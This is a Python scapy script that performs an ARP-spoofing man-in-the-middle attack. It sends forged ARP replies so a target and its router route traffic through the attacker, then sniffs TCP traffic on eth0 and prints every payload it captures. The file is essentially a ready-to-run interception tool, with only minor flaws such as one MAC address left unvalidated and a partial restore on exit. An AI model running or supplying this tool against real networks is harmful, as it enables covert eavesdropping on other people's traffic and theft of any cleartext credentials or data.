#!/usr/bin/env python
import scapy.all as scapy
import ipaddress
import argparse
import sys
import os
import re

def restore(destination_ip, source_ip, destination_mac, source_mac):
	packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac)
	scapy.send(packet, verbose = False)

def handlePackets(packet):
	if packet.haslayer(scapy.TCP):
		src_ip = packet[scapy.IP].src
		dst_ip = packet[scapy.IP].dst
		src_port = packet[scapy.TCP].sport
		dst_port = packet[scapy.TCP].dport
		print(f"TCP Packet: {src_ip}:{src_port} -> {dst_ip}:{dst_port}")
		if packet[scapy.TCP].payload:
			print(f"Payload: {bytes(packet[scapy.TCP].payload)}")
		print("-" * 50)

def poison(args):
	spoof(args.IP_target, args.MAC_target, args.IP_src) # Tells the target (his IP and MAC address) that my MAC address is linked to the router's IP
	spoof(args.IP_src, args.MAC_src, args.IP_target) # Tells the router // that my MAC address is linked to the target
	scapy.sniff(iface="eth0", prn=handlePackets, filter="tcp") # Analyses traffic (Here specifically on TCP using the handlePackets() function)

def spoof(target_ip, target_mac, spoof_ip): 
	packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = target_mac, psrc = spoof_ip) # op stands for response (meaning the packet created is a response to a query), pdst = IP destination, hwdst = HardWare (MAC address) destination, psrc = IP source...
	scapy.send(packet, verbose = False)

def isValidMacAddress(mac):
	mac_regex = re.compile(r'^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$')
	if bool(mac_regex.match(mac)) == False:
		raise ValueError(f"The current MAC address: {mac} is not formatted to MAC standard.")

def isValidIp(ipaddr : str):
	ip = ipaddress.ip_address(ipaddr)
	if not ip.version == 4:
		raise ValueError(f"The current IP: {ip}, is not formatted to IPV4 standard.")

def main() :
	try:
		parser = argparse.ArgumentParser(description="l'homme du milieu")
		parser.add_argument("IP_src", type=str)
		parser.add_argument("MAC_src", type=str)
		parser.add_argument("IP_target", type=str)
		parser.add_argument("MAC_target", type=str)
		args = parser.parse_args()
		isValidIp(args.IP_src)
		isValidMacAddress(args.MAC_src)
		isValidIp(args.IP_target)
		isValidMacAddress(args.MAC_src)
		poison(args)
	except ValueError as e:
		print(f"ValueError: {e}")
	except Exception as e:
		print(f"Error: {e}")
	except KeyboardInterrupt:
		restore(args.IP_target, args.IP_src, args.MAC_target, args.MAC_src)
		print("Process interrupted. Exiting Gracefully...")


if __name__ == "__main__" :
	main()